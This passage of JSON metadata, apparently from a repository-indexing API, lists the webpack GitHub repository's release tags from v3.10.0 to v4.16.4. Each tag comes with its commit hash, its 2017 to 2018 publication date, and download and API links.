1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02: